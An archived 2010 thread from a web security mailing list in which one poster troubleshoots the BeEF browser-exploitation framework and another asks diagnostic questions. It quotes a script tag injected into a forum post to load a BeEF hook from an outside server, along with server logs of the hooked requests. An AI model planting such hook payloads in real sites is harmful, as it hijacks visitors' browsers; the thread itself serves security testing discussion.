[WEB SECURITY] beef question

Alex Fiuvertiz fiuvertiz at gmail.com
Thu Jun 17 06:41:38 EDT 2010


Hi,

The source code shows up in the browser (when right-clicking->show source) as:
<script language="Javascript"
src="http://myserver.com/beef/hook/beefmagic.js.php"></script>

I've attached an image of what the UI on the server looks like when
the forum post has been made. The version deployed is 0.4.0.0

x.x.x.x - - [17/Jun/2010:12:33:55 +0200] "GET
/beef/hook/beefmagic.js.php HTTP/1.1" 200 3849

The following request comed in every one second approx:
x.x.x.x - - [17/Jun/2010:12:33:55 +0200] "GET
/beef/ui/get_zombie_details.php?zombie=all&detail=list HTTP/1.1" 200 4

/ Alex


2010/6/16 Dan Anderson <dan-anderson at cox.net>:
> Sorry, I see your other posting now.
>
>>When I instead do a forum post with:
>><script src="http://www.example.com/beef/hook/beefmagic.js.php"></script>
>>
>>...the Zombie doesn't show up (when I visit the forum post). But the
>>server gets the request (and is answering with a 200 OK).
>
> When you go to the forum page.  What does the page source (right click
> - view source) look like for your post?  Do you see, "<script
> src="http://www.example.com/beef/hook/beefmagic.js.php"></script>"
> embedded, unmodified in the html source?
>
> What does your server log look like?  Is the request for
> "http://www.example.com/beef/hook/beefmagic.js.php"?
>
> Dan
>
> On Wed, Jun 16, 2010 at 3:39 AM, Dan Anderson <dan-anderson at cox.net> wrote:
>> So, is the problem you are having that the zombies are not showing up
>> under the "BeEF" cow?
>>
>> Are they showing up at all (i.e. in the zombies menu?)
>>
>> Dan
>>
>
>>> / Alex
>>
>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: beef_result.JPG
Type: image/jpeg
Size: 94485 bytes
Desc: not available
URL: <http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/attachments/20100617/361dacc7/attachment.JPG>
-------------- next part --------------
----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec

Have a question? Search The Web Security Mailing List Archives: 
http://www.webappsec.org/lists/websecurity/archive/

Subscribe via RSS: 
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

To unsubscribe email websecurity-unsubscribe at webappsec.org and reply to 
the confirmation email

Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA


More information about the websecurity mailing list